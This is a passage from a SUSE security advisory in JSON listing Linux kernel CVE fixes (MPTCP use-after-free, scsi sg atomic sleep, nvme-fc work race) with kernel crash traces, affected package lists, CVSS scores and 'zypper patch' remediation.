net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
